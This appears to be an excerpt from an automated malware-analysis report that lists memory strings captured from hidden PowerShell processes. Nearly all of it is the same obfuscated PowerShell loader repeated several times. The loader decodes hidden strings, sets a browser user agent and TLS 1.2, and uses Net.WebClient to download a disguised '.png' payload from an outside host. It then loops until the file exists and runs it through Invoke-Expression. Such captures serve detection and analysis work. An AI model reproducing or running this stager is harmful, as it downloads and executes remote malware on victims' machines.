eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na ia TrPerBeaHunPld.eeSan.e4Re= I(
Source: powershell.exe, 00000002.00000002.2361305747.0000020B5CFA2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: "If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na ia TrPerBeaHunPld.eeSan.e4Re= I(KoT ievasemtE,-,iPDuaF.tG.hFe Kd$,iGtieFur KmNoaFonWai.ueKusF
Source: powershell.exe, 00000002.00000002.2360203175.0000020B5AC65000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: powershell.exe-windowstylehiddenIf (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na ia TrPerBeaHunPld.eeSan.e4Re= I(KoT ievasemtE,-,iPDuaF.tG.hFe
Source: powershell.exe, 00000005.00000002.2196876058.0000000002C60000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\Users\user\Desktop\C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshi
Source: powershell.exe, 00000002.00000002.2361305747.0000020B5CFA2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2196688153.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2202717320.0000000007397000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2206269200.000000000C162000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na ia TrPerBeaHunPld.eeSan.e4Re= I(K
Source: powershell.exe, 00000002.00000002.2361305747.0000020B5CEDD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: rentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na ia TrPerBeaHunPld.eeSan.e4Re= I(KoT ievasemtE,-,iPDuaF.tG.hFe Kd$,iGtieFur KmNoaFonWai.ueKusF.)La ') ;Sloshil
Source: powershell.exe, 00000002.00000002.2361305747.0000020B5CFD7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2361305747.0000020B5CFCA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: skolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na ia TrPerBeaHunPld.eeSan.e4Re= I(KoT ievasemtE,-,iPDuaF.tG.hFe Kd$,iGtieFur KmNoaFonWai.ueKusF.)La ') ;Sloshily (Indbandtes ' r$Stg u
Source: powershell.exe, 00000002.00000002.2357862558.0000020B5A9A0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\Users\user\Desktop\C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -windowstyle hidden "If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & 